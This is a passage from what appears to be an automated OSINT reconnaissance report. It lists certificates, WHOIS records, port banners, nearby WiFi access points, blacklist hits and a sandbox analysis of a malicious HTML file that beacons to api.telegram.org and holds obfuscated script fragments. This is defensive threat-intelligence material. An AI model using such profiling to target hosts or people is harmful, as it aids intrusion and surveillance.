Pattern match: "CLIDeecbea2c7081455a9dcf0f033f7537b7.20230404.20240403www.clarity.ms/2147492865424520947231098343321968605431024901*"\n Pattern match: "www.clarity.ms/"\n Pattern match: "https://github.com/microsoft/clarity"\n Pattern match: "C.JgU/0$"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z+N0L0J+0"\n Pattern match: "www.microsoft.com0"\n Patt | 185.199.109.153 |
| 2023-05-12 02:44:21 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:97:99:5c:60:ac:40:68:f8:b2:de:0a:67:7a:da:b7:d1:16
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 24 03:02:53 2023 GMT
Not After : May 25 03:02:52 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ed:bc:d0:71:75:f9:c1:51:79:49:f8:25:6c:e2:
4b:7a:05:e1:2b:6c:79:44:98:ff:b2:cc:bc:d7:da:
27:25:29:37:c7:ba:80:cb:e1:7c:b8:4d:37:a2:bc:
93:44:eb:bc:62:ff:47:cb:21:ea:3d:05:4c:04:57:
82:93:5b:a9:25:29:fb:98:33:b0:04:74:aa:bc:9a:
64:5e:c7:e2:6c:e5:ec:2a:e7:40:6b:e1:75:93:39:
b3:cf:b8:e9:11:29:e6:d1:9e:08:56:54:16:9f:c1:
1d:1f:f5:f6:ca:48:3a:94:53:03:1d:bf:52:af:6e:
27:9d:80:8d:f0:57:28:d4:f0:01:34:f4:39:59:4a:
df:9f:00:47:87:9a:39:38:c1:8f:84:8a:02:0b:b2:
6e:5c:36:a2:f6:35:e6:d2:23:6b:29:b1:15:aa:86:
a3:5b:eb:30:cc:af:b8:df:d5:0e:8f:8e:29:7e:0d:
21:28:d0:d2:4c:71:5b:19:01:9b:dc:b9:90:88:7d:
fc:5d:3e:72:44:e6:46:11:dd:e6:fd:a5:42:a3:07:
24:e7:29:d9:29:1c:f3:72:77:8b:cb:0b:df:45:34:
0b:81:a8:00:de:f0:13:74:1b:bf:2f:61:ad:65:73:
29:3e:05:b5:c3:90:28:8c:96:ef:cb:b3:06:ba:9b:
6b:f7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C4:85:82:A3:5E:ED:4D:54:E9:0D:BD:02:AC:67:B2:FA:F3:E1:58:3F
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Feb 24 04:02:53.639 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:28:F1:70:B2:E6:F5:A1:9C:C3:2A:B9:98:
B7:CA:DE:46:06:8A:0D:FD:5D:51:62:6A:9E:AF:A7:18:
F8:56:D1:B0:02:20:21:A4:D3:7B:9B:94:A5:33:57:25:
EA:F9:E9:6B:7D:DB:3E:9B:70:AC:99:47:BB:60:A1:D8:
D4:9F:E0:9F:F4:44
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Feb 24 04:02:53.699 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:3D:E9:FF:70:A3:4B:24:45:DE:32:CD:C1:
EB:D6:68:50:E8:90:39:17:70:65:2F:C3:8E:27:EF:8F:
0A:2C:12:42:02:20:63:BD:B7:88:53:11:AE:74:C0:8C:
3E:DD:9A:2F:D6:E5:34:A4:8C:A2:AB:43:8C:64:7E:9B:
D2:8E:90:08:CE:60
Signature Algorithm: sha256WithRSAEncryption
7e:31:5b:b5:c6:0c:16:27:0b:f5:1a:b3:80:a7:ef:5e:5f:1b:
87:38:b7:8a:be:5c:4b:2a:3f:28:2b:4f:87:5f:c2:b4:d3:b7:
be:f8:28:f5:15:c7:b3:3f:3d:40:b4:03:a4:95:06:01:1a:58:
1f:75:36:4b:ec:65:5a:e0:fd:b0:bf:41:e3:ff:57:4e:dd:05:
47:2c:e5:74:c8:5a:58:19:d6:53:61:f6:8d:0e:19:29:5d:dd:
b2:13:e8:c5:4c:7e:68:dc:f2:b4:05:5a:13:8e:d2:2e:4e:5e:
81:10:a5:86:8f:30:30:f7:61:4a:6f:5c:17:0d:a4:ef:13:02:
05:48:b0:18:ac:9c:df:24:70:12:e3:44:ac:31:54:f5:b6:92:
f4:ec:b6:e7:16:93:23:c7:b8:7e:51:5c:f7:05:33:1c:0e:7a:
b3:3d:ed:21:03:d2:bc:a5:bf:10:81:1f:4c:79:d4:3a:73:b9:
93:9f:57:8b:98:ea:3e:74:39:70:99:3d:3a:c0:f2:4d:e1:55:
ed:dc:49:4e:a6:39:a5:82:ea:2d:6e:e9:17:c6:72:75:ec:10:
72:d0:c9:3e:b9:30:69:bc:2f:70:06:3c:ba:31:b6:c1:0c:45:
e6:92:88:78:56:3a:d4:0c:d2:32:b8:49:37:f3:c4:6d:15:69:
54:99:0a:d9
|
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 401 Unauthorized
Date: <REDACTED>
Server: cPanel
Persistent-Auth: false
Host: 87.248.157.102:2077
Cache-Control: no-cache, no-store, must-revalidate, private
Connection: close
Vary: Accept-Encoding
WWW-Authenticate: Basic realm="Restricted Area"
Content-Encoding: gzip
Content-Length: 52
Content-Type: text/html; charset="utf-8"
Expires: Fri, 01 Jan 1990 00:00:00 GMT
| 87.248.157.102 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | denis (Net ID: 00:01:46:02:C4:4C) | 37.780462,-122.390564 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | <no ssid> (Net ID: 00:02:2D:8E:E3:CD) | 50.1188, 8.6843 |
| 2023-05-12 03:09:25 | Co-Hosted Site - Domain Whois | No | Whois | 2 | 0 | 4 | 0 | None | Domain Name: DONTKILLMYAPP.COM
Registry Domain ID: 2344645406_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.ascio.com
Registrar URL: http://www.ascio.com
Updated Date: 2022-11-24T07:34:59Z
Creation Date: 2018-12-19T04:28:10Z
Registry Expiry Date: 2023-12-19T04:28:10Z
Registrar: Ascio Technologies, Inc. Danmark - Filial af Ascio technologies, Inc. USA
Registrar IANA ID: 106
Registrar Abuse Contact Email: abuse@ascio.com
Registrar Abuse Contact Phone: +1.4165350123
Domain Status: ok https://icann.org/epp#ok
Name Server: NS.WEDOS.COM
Name Server: NS.WEDOS.CZ
Name Server: NS.WEDOS.EU
Name Server: NS.WEDOS.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:09:05Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: dontkillmyapp.com
Registry Domain ID: 2344645406_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.ascio.com
Registrar URL: http://www.ascio.com
Updated Date: 2022-11-24T07:35:59Z
Creation Date: 2018-12-19T00:00:00Z
Registrar Registration Expiration Date: 2023-12-19T04:28:10Z
Registrar: Ascio Technologies, Inc
Registrar IANA ID: 106
Registrar Abuse Contact Email: abuse@ascio.com
Registrar Abuse Contact Phone: +44 (20) 81583881
Domain Status: OK https://icann.org/epp#ok
Registry Registrant ID: Not Disclosed
Registrant Name: Not Disclosed
Registrant Organization: Not Disclosed
Registrant Street: Not Disclosed
Registrant City: Not Disclosed
Registrant State/Province:
Registrant Postal Code: Not Disclosed
Registrant Country: CZ
Registrant Phone: Not Disclosed
Registrant Phone Ext: Not Disclosed
Registrant Fax: Not Disclosed
Registrant Fax Ext: Not Disclosed
Registrant Email: https://whoiscontact.ascio.com?domainname=dontkillmyapp.com
Registry Admin ID: Not Disclosed
Admin Name: Not Disclosed
Admin Organization: Not Disclosed
Admin Street: Not Disclosed
Admin City: Not Disclosed
Admin State/Province: Not Disclosed
Admin Postal Code: Not Disclosed
Admin Country: Not Disclosed
Admin Phone: Not Disclosed
Admin Phone Ext: Not Disclosed
Admin Fax: Not Disclosed
Admin Fax Ext: Not Disclosed
Admin Email: Not Disclosed
Registry Tech ID: Not Disclosed
Tech Name: Not Disclosed
Tech Organization: Not Disclosed
Tech Street: Not Disclosed
Tech City: Not Disclosed
Tech State/Province: Not Disclosed
Tech Postal Code: Not Disclosed
Tech Country: Not Disclosed
Tech Phone: Not Disclosed
Tech Phone Ext: Not Disclosed
Tech Fax: Not Disclosed
Tech Fax Ext: Not Disclosed
Tech Email: Not Disclosed
Name Server: ns.wedos.net
Name Server: ns.wedos.cz
Name Server: ns.wedos.eu
Name Server: ns.wedos.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: https://icann.org/wicf
>>> Last update of WHOIS database: 2023-05-12T03:09:25Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
The data in Ascio Technologies' WHOIS database is provided
by Ascio Technologies for information purposes only. By submitting
a WHOIS query, you agree that you will use this data only for lawful
purpose. In addition, you agree not to:
(a) use the data to allow, enable, or otherwise support any marketing
activities, regardless of the medium used. Such media include but are
not limited to e-mail, telephone, facsimile, postal mail, SMS, and
wireless alerts; or
(b) use the data to enable high volume, automated, electronic processes
that send queries or data to the systems of any Registry Operator or
ICANN-Accredited registrar, except as reasonably necessary to register
domain names or modify existing registrations.
(c) sell or redistribute the data except insofar as it has been
incorporated into a value-added product or service that does not permit
the extraction of a substantial portion of the bulk data from the value-added
product or service for use by other parties.
Ascio Technologies reserves the right to modify these terms at any time.
Ascio Technologies cannot guarantee the accuracy of the data provided.
By accessing and using Ascio Technologies WHOIS service, you agree to these terms.
| dontkillmyapp.com |
| 2023-05-12 03:24:51 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | Turkey | Domain Name: KEYUBU.COM
Registry Domain ID: 2292564494_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2022-07-15T17:58:33Z
Creation Date: 2018-07-31T21:39:32Z
Registry Expiry Date: 2023-07-31T21:39:32Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: KEYUBU.COM
Registry Domain ID : 2292564494_DOMAIN_COM-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2022-07-15T17:58:33Z
Creation Date: 2018-07-31T21:39:32Z
Registrar Registration Expiration Date: 2023-07-31T21:39:32Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: ADANA
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=KEYUBU.COM
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T03:12:03Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S., uluslararasi alan adi kayit otoritesi olan ICANN
onayli bir alan adi kayit firmasidir.
Bu alan adina ait web sitesinin icerigi ya da yayinlanmasiyla hicbir sekilde ilgisi yoktur.
Sadece, ICANN kurallari cercevesinde alan adinin kayit edilmesine aracilik yapmaktadir.
Bu alan adi sahibinin kayit sirasinda verdigi bilgiler yukaridaki gibidir.
NICS Telekomunikasyon A.S., bu bilgilerin dogrulugunu garanti edemez.
Daha fazla bilgi almak icin info [at] nicproxy.com adresine yazabilirsiniz.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
|
| 2023-05-12 03:03:59 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | ebrahemsamir.github.io | 185.199.109.153 |
| 2023-05-12 02:54:23 | HTTP Headers | No | Censys | 0 | 0 | 4 | 0 | None | {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Content_Length": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Content_Length": ["0"], "X_Nf_Request_Id": ["01H061ZY9N5FV8EXSVB32WY78R"], "Server": ["Netlify"]} | 2600:1f18:2489:8201::c8 |
| 2023-05-12 03:01:18 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.162): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:47:32 | Raw Data from RIRs | No | Hybrid Analysis | 2 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 16, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'WAV-797251.html', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.telegram.org"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "widevinecdm.dll" as clean (type is "PE32+ executable (DLL) (console) x86-64 for MS Windows")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.22.59.100:443"\n "185.199.111.153:443"\n "13.227.74.44:443"\n "149.154.167.220:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8096:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8096:120:WilError_01"\n "Local\\SM0:8096:120:WilError_01"\n "Local\\SM0:8096:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5004:304:WilStaging_02"\n "Local\\SM0:5004:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3416:304:WilStaging_02"\n "Local\\SM0:3416:304:WilStaging_02"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "product_page.js" - Location: [%TEMP%\\8096_1032656472\\product_page.js]- [targetUID: 00000000-00008096]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\8096_1032656472\\edge_tracking_page_validator.js]- [targetUID: 00000000-00008096]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\8096_1032656472\\auto_open_controller.js]- [targetUID: 00000000-00008096]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\8096_1032656472\\shopping_iframe_driver.js]- [targetUID: 00000000-00008096]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\8096_1032656472\\shoppingfre.js]- [targetUID: 00000000-00008096]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\8096_1032656472\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00008096]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\8096_1032656472\\edge_checkout_page_validator.js]- [targetUID: 00000000-00008096]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\8096_1534272233\\adblock_snippet.js]- [targetUID: 00000000-00008096]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00008096]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00008096]\n "a369bab2-3926-4626-a576-669ff0c25556.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\a369bab2-3926-4626-a576-669ff0c25556.tmp]- [targetUID: 00000000-00008096]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\manifest.json]- [targetUID: 00000000-00008096]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00008096]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\8096_1032656472\\product_page.js]- [targetUID: 00000000-00008096]\n "eaa46630-4898-435c-8b79-12a101475848.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\eaa46630-4898-435c-8b79-12a101475848.tmp]- [targetUID: 00000000-00008096]\n "widevinecdm.dll.sig" has type "data"- Location: [%TEMP%\\8096_313714830\\_platform_specific\\win_x64\\widevinecdm.dll.sig]- [targetUID: 00000000-00008096]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00008096]\n "cf602cb1-b95f-433b-8ffc-9eebfa799f0b.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\cf602cb1-b95f-433b-8ffc-9eebfa799f0b.tmp]- [targetUID: 00000000-00003416]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\edge_driver.js]- [targetUID: 00000000-00008096]\n "7de6d455-5aa2-4101-812b-70e599317de8.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\7de6d455-5aa2-4101-812b-70e599317de8.tmp]- [targetUID: 00000000-00003416]\n "4feeb93c-9f79-45f0-9ac6-0adffcb5a10a.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\4feeb93c-9f79-45f0-9ac6-0adffcb5a10a.tmp]- [targetUID: 00000000-00008096]\n "deny_domains.list" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Web Notifications Deny List\\1.1.0.0\\deny_domains.list]- [targetUID: 00000000-00008096]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00008096]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00008096]\n "1be98bdb-eeab-4983-9a3f-102d5eb80cfa.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\1be98bdb-eeab-4983-9a3f-102d5eb80cfa.tmp]- [targetUID: 00000000-00008096]\n "safety_tips.pb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\SafetyTips\\2844\\safety_tips.pb]- [targetUID: 00000000-00008096]\n "6419c6fb-280c-4dec-97ac-cbb742fa50bc.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\6419c6fb-280c-4dec-97ac-cbb742fa50bc.tmp]- [targetUID: 00000000-00008096]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00008096]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "jLP\',\'KDqei\',\'vXqYi\',\'GOqYh\',\'gISTU\',\'n()\\x20\',\'roJBb\',\'FXzcw\',\'__pro\',\'warn\',\'PukFk\',\'EAlzP\',\'YvMmB\',\'iiLHY\',\'tQrEe\',\'mGJfV\',\'strin\',\'pbBLV\',\'KlDNI\',\'nbsJn\',\'kVpKR\',\'BiHjg\',\'FNmxz\',\'sWuxZ\',\'ZOmpK\',\'om%2f\',\'FpgMT\',\'sjuIm\',\'style\',\'round\',\'EuVvW\',\'Qydgv\',\'s"\n Heuristic match: "api.telegram.org"\n Heuristic match: "l@allledglobal.com"\n Heuristic match: "german.l@alliedglobal.com"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Connection was make using TLSv1.2 [tls.handshake.version: 0x00000303]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', 